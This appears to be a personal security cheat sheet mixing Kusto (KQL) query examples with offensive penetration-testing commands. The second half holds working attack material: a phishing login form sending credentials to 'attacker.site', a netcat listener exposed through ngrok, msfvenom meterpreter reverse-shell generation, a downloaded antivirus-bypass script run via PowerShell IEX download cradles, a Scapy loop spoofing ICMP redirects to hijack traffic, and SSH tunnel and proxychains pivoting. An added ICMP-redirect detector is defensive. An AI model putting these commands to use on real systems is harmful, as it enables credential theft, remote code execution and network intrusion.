Returns the number of rows
Perf
| where TimeGenerated >= ago(1h)
and CounterName == "Bytes Received/sec"
and CounterValue > 0
| count
take returns an arbitrary (unordered) set of up to N records from the data set
Perf
| where TimeGenerated >= ago(1h)
and CounterName == "Bytes Received/sec"
and CounterValue > 0
| take 5
limit is a synonym for take and can be used to limit the number of records returned
Perf
| where TimeGenerated >= ago(1h)
and CounterName == "Bytes Received/sec"
and CounterValue > 0
| limit 5
where filters the result set
Search the table for data generated since one hour ago
Perf
| where TimeGenerated >= ago(1h)
ago allows you to select relative date ranges
Combine where with AND statement
Perf
| where TimeGenerated >= ago(1h)
and CounterName == "Bytes Received/sec"
and CounterValue > 0
Combine where with OR statement
Perf
| where TimeGenerated >= ago(1h)
and (CounterName == "Bytes Received/sec"
or
CounterName == "% Processor Time"
)
and CounterValue > 0
Stacking where operators (useful for in-between processing, e.g. if/else logic)
Perf
| where TimeGenerated >= ago(1h)
| where (CounterName == "Bytes Received/sec"
or
CounterName == "% Processor Time"
)
| where CounterValue > 0
Simulate search with where command
//Search any column for the term Bytes (has matches whole terms only)
Perf
| where * has "Bytes"
//Search any column for a term that starts with Bytes
Perf
| where * hasprefix "Bytes"
//Search any column for a term that ends with Bytes
Perf
| where * hassuffix "Bytes"
//Search any column for the substring Bytes (contains is not term-based)
Perf
| where * contains "Bytes"
//Search any string in a column using regex
Perf
| where InstanceName matches regex "[A-Z]:"
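The difference between has, hasprefix, hassuffix and contains decides which counters a detection query actually returns. The following Python model is an added example, not part of the original notes: it emulates KQL's term-based string operators (a term is taken as a run of alphanumerics, a simplification of the real tokenizer; all comparisons case-insensitive) over constructed Perf rows and shows which CounterName values each operator returns for "Bytes".

```python
import re
from typing import Callable, Dict, List

# Constructed sample rows standing in for the Perf table (not real telemetry).
PERF_ROWS: List[Dict[str, str]] = [
    {"CounterName": "Bytes Received/sec", "InstanceName": "_Total"},
    {"CounterName": "Available MBytes", "InstanceName": ""},
    {"CounterName": "% Processor Time", "InstanceName": "_Total"},
    {"CounterName": "Free Megabytes", "InstanceName": "C:"},
]

# Simplified KQL term model (assumption): a term is a run of alphanumerics,
# and every string operator below is case-insensitive.
TERM_RE = re.compile(r"[A-Za-z0-9]+")

def terms(value: str) -> List[str]:
    return [t.lower() for t in TERM_RE.findall(value)]

def kql_has(value: str, needle: str) -> bool:        # a whole term equals needle
    return needle.lower() in terms(value)

def kql_hasprefix(value: str, needle: str) -> bool:  # some term starts with needle
    return any(t.startswith(needle.lower()) for t in terms(value))

def kql_hassuffix(value: str, needle: str) -> bool:  # some term ends with needle
    return any(t.endswith(needle.lower()) for t in terms(value))

def kql_contains(value: str, needle: str) -> bool:   # plain substring match
    return needle.lower() in value.lower()

def kql_matches_regex(value: str, pattern: str) -> bool:  # unanchored partial match
    return re.search(pattern, value) is not None

OPERATORS: Dict[str, Callable[[str, str], bool]] = {
    "has": kql_has, "hasprefix": kql_hasprefix,
    "hassuffix": kql_hassuffix, "contains": kql_contains,
}

def where_star(rows: List[Dict[str, str]], op: str, needle: str) -> List[Dict[str, str]]:
    """Emulate `| where * <op> "needle"`: keep a row if any column satisfies op."""
    pred = OPERATORS[op]
    return [r for r in rows if any(pred(v, needle) for v in r.values())]

def counters_matching(op: str, needle: str) -> List[str]:
    return [r["CounterName"] for r in where_star(PERF_ROWS, op, needle)]

def instances_matching_regex(pattern: str) -> List[str]:
    """Emulate `| where InstanceName matches regex "pattern"`."""
    return [r["InstanceName"] for r in PERF_ROWS if kql_matches_regex(r["InstanceName"], pattern)]
```

With these rows, has and hasprefix return only "Bytes Received/sec", while hassuffix and contains also return "Available MBytes" and "Free Megabytes".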
String search through all tables (do not use in production!)
search "memory"
Limit string search to a specific range of tables
search in (Perf, Events) "memory"
Limit string search to one table
Perf | search "memory"
Search for the exact string "Available MBytes"
Perf | search CounterName == "Available MBytes"
Search for string in column that contains MBytes
Perf | search CounterName:"MBytes"
Search for string in all columns containing string Bytes
Perf | search "Bytes"
Search for string in all columns starting with Bytes
Perf | search * startswith "Bytes"
Search for string in all columns ending with Bytes
Perf | search * endswith "Bytes"
Search for string in all columns that starts with Free and ends with Bytes
Perf | search "Free*bytes"
Search for string in all columns that starts with Free and ends with Bytes that contain either C: or D:
Perf | search "Free*bytes" and ("C:" or "D:")
Search table column for string using regex
Perf
| search InstanceName matches regex "[A-Z]:"
List auto-start services whose executable path is outside C:\Windows and not quoted (unquoted service path check)
wmic service get name,displayname,pathname,startmode | findstr /I "auto" | findstr /I /v "c:\windows\" | findstr /i /v """
Start netcat listener
ncat -lvp 4444
Start ngrok to make the listener URL publicly accessible
./ngrok http 4444
Send page to users:
<b>Login required</b><br><br><b>ENTER Credentials:</b><br><br><form action="http://attacker.site" method="GET"><input type="text" name="email" placeholder="Your Username"><br><input type="password" name="password"><br><input type="submit" value="Submit"></form>
1. create MSFVENOM payload
msfvenom -p windows/x64/meterpreter/reverse_https -f psh LHOST=10.10.20.142 LPORT=443 > '/home/kali/http/https2.ps1'
2. copy raw from https://github.com/aloksaurabh/OffenPowerSh/tree/master/Bypass
curl https://raw.githubusercontent.com/aloksaurabh/OffenPowerSh/master/Bypass/Invoke-AlokS-AvBypass.ps1 > demo.ps1
3. python2 -m SimpleHTTPServer 80
4. IEX (New-Object Net.WebClient).DownloadString('http://10.10.20.142/demo.ps1');Invoke-AlokS-AvBypass
5. IEX (New-Object Net.WebClient).DownloadString('http://10.10.20.142/https2.ps1')
Enable IP forwarding and source NAT translation for the victim subnet
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward    (sudo echo 1 > /proc/... fails: the redirect is done by the unprivileged shell)
sudo iptables -t nat -A POSTROUTING -s 10.100.13.0/255.255.255.0 -o tap0 -j MASQUERADE
sudo iptables --append FORWARD --in-interface eth0 -j ACCEPT    (only needed to allow forwarded traffic)
sudo iptables -t nat -L    (verify the NAT rules)
Scapy: create an ICMP redirect packet (type=5, code=1) advertising a "better" gateway for destination 10.23.56.100 (interactive session; display() needs the parentheses, otherwise only the bound method is printed)
>>> ip = IP()
>>> ip.src = '10.100.13.1'
>>> ip.dst = '10.100.13.126'
>>> ip.display()
>>> icmp = ICMP()
>>> icmp.type = 5
>>> icmp.code = 1
>>> icmp.gw = '10.100.13.20'
>>> icmp.display()
>>> ip2 = IP()
>>> ip2.src = '10.100.13.126'
>>> ip2.dst = '10.23.56.100'
>>> ip2.display()
# Creating and sending ICMP redirect packets (script version)
from scapy.all import IP, ICMP, TCP, send

originalRouterIP = '10.100.13.1'
attackerIP = '10.100.13.20'
victimIP = '10.100.13.126'
serverIP = '10.23.56.100'

# We create an ICMP Redirect packet, spoofed as coming from the real router
ip = IP()
ip.src = originalRouterIP
ip.dst = victimIP

icmpRedirect = ICMP()
icmpRedirect.type = 5
icmpRedirect.code = 1
icmpRedirect.gw = attackerIP

# The ICMP packet payload /should/ contain the original TCP SYN packet
# sent from the victim IP
redirPayloadIP = IP()
redirPayloadIP.src = victimIP
redirPayloadIP.dst = serverIP

fakeOriginalTCPSYN = TCP()
fakeOriginalTCPSYN.flags = "S"
fakeOriginalTCPSYN.dport = 80
fakeOriginalTCPSYN.seq = 444444444
fakeOriginalTCPSYN.sport = 55555

while True:
    send(ip / icmpRedirect / redirPayloadIP / fakeOriginalTCPSYN)  # Press <enter> / Ctrl-C to stop
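From the defender's side, the same packet layout is what a sensor has to recognise. The following Python is an added example, not part of the original notes: it builds a constructed ICMP redirect of the shape the script above sends (raw struct packing, no scapy required) and parses it back, flagging any redirect whose advertised gateway is not in an assumed list of legitimate routers (TRUSTED_GATEWAYS and the sample addresses are assumptions for the test).

```python
import socket
import struct
from typing import Dict, List, Optional

ICMP_REDIRECT = 5
TRUSTED_GATEWAYS = {"10.100.13.1", "10.100.13.2"}  # assumed legitimate routers (assumption)

def _checksum(data: bytes) -> int:               # RFC 1071 ones-complement sum
    if len(data) % 2:
        data += b"\0"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    total = (total >> 16) + (total & 0xFFFF)
    return (~(total + (total >> 16))) & 0xFFFF

def _ipv4_header(src: str, dst: str, proto: int, payload_len: int) -> bytes:
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, 0, 0, 64, proto, 0,
                      socket.inet_aton(src), socket.inet_aton(dst))
    return hdr[:10] + struct.pack("!H", _checksum(hdr)) + hdr[12:]

def build_redirect(router: str, victim: str, gateway: str, server: str) -> bytes:
    """Constructed test packet: ICMP type 5 code 1 quoting the victim's TCP SYN to server:80."""
    quoted = _ipv4_header(victim, server, 6, 8) + struct.pack("!HHL", 55555, 80, 444444444)
    icmp = struct.pack("!BBH4s", ICMP_REDIRECT, 1, 0, socket.inet_aton(gateway)) + quoted
    icmp = icmp[:2] + struct.pack("!H", _checksum(icmp)) + icmp[4:]
    return _ipv4_header(router, victim, 1, len(icmp)) + icmp

def parse_redirect(pkt: bytes) -> Optional[Dict[str, str]]:
    """Return the redirect's fields, or None when pkt is not an ICMP redirect."""
    if len(pkt) < 20 or pkt[9] != 1:             # IP protocol 1 = ICMP
        return None
    ihl = (pkt[0] & 0x0F) * 4
    icmp = pkt[ihl:]
    if len(icmp) < 8 + 20 + 4 or icmp[0] != ICMP_REDIRECT:
        return None
    inner = icmp[8:]                              # quoted original IPv4 header + 8 bytes
    off = (inner[0] & 0x0F) * 4
    return {
        "src": socket.inet_ntoa(pkt[12:16]), "dst": socket.inet_ntoa(pkt[16:20]),
        "gateway": socket.inet_ntoa(icmp[4:8]),
        "orig_src": socket.inet_ntoa(inner[12:16]), "orig_dst": socket.inet_ntoa(inner[16:20]),
        "orig_dport": str(struct.unpack("!H", inner[off + 2:off + 4])[0]),
    }

def redirect_alerts(pkt: bytes) -> List[str]:
    """Detection rule: a redirect is suspect when its advertised gateway is not a known router."""
    r = parse_redirect(pkt)
    if r is None or r["gateway"] in TRUSTED_GATEWAYS:
        return []
    return [f"redirect from {r['src']} to {r['dst']} advertises untrusted gateway {r['gateway']} "
            f"for {r['orig_dst']}:{r['orig_dport']}"]
```

Hosts that set net.ipv4.conf.all.accept_redirects=0 ignore such packets outright; the parser above is for spotting them on the wire or in a capture.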
Listen local port 9999 to forward traffic to target rdp using SSH tunnel of exploited host
ssh -L 9999:10.10.20.140:3389 msx@192.168.68.117
Use proxychains with an SSH SOCKS proxy (-D) to route traffic through the exploited host
ssh -D 127.0.0.1:1090 msx@192.168.68.117
Usage example: nmap scans through the proxy (TCP connect scans only, since proxychains cannot relay raw packets)
proxychains nmap -sT -v 10.10.20.140
proxychains nmap -sT -PN -n -sV -p 80,443,21,22 10.10.20.129
proxychains nmap -sTV -n -PN -p 21 10.10.51.21